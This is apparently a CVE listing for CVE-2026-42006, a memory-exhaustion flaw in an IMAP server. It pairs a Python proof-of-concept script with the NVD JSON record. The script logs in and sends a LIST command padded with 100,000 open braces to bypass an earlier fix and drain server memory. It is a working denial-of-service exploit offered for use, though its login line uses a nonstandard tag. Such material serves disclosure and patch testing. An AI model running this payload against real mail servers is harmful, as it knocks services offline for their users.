CVE-2026-42006

#!/usr/bin/env python3 """ Proof of Concept for CVE-2026-42006 Demonstrates memory exhaustion via excessive open braces in IMAP. Note: For educational purposes only. """ import socket import sys def send_exploit(target, port, username, password): print(f"[*] Connecting to {target}:{port}...") try: # Establish TCP connection to IMAP server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, port)) # Read server banner banner = s.recv(1024).decode() print(f"[+] Server banner: {banner.strip()}") # Authenticate print(f"[*] Authenticating as {username}...") s.send(f"* LOGIN {username} {password}\r\n".encode()) resp = s.recv(1024).decode() if "OK" not in resp: print("[-] Authentication failed.") return print("[+] Authentication successful.") # Send payload with excessive open braces # Bypasses the fix for CVE-2026-27857 which only blocked closing braces print("[*] Sending malicious payload with excessive open braces...") # Creating a large string of open braces payload = "A001 LIST INBOX " + "{" * 100000 + "}\r\n" s.send(payload.encode()) # Wait for server response or timeout print("[+] Payload sent. Monitor server memory usage.") except Exception as e: print(f"[-] An error occurred: {e}") finally: s.close() if __name__ == "__main__": if len(sys.argv) != 5: print(f"Usage: python3 {sys.argv[0]} <target_ip> <port> <user> <pass>") sys.exit(1) send_exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4])

{"cve": {"id": "CVE-2026-42006", "sourceIdentifier": "[email protected]", "published": "2026-05-12T14:17:04.703", "lastModified": "2026-05-12T15:08:22.857", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attacker can cause uncontrolled memory usage with excessive bracing over IMAP. The fix in CVE-2026-27857 was incomplete, only blocking one way of doing this, so there was still another way left open. In particular, the fix was for closing braces, but you could still use open braces to bypass the limit. Using excessive bracing, attacker can cause memory usage up to configured memory limit. Install fixed version, or configure vsz_limit for imap process to low value. No publicly available exploits are known."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0002.json", "source": "[email protected]"}]}}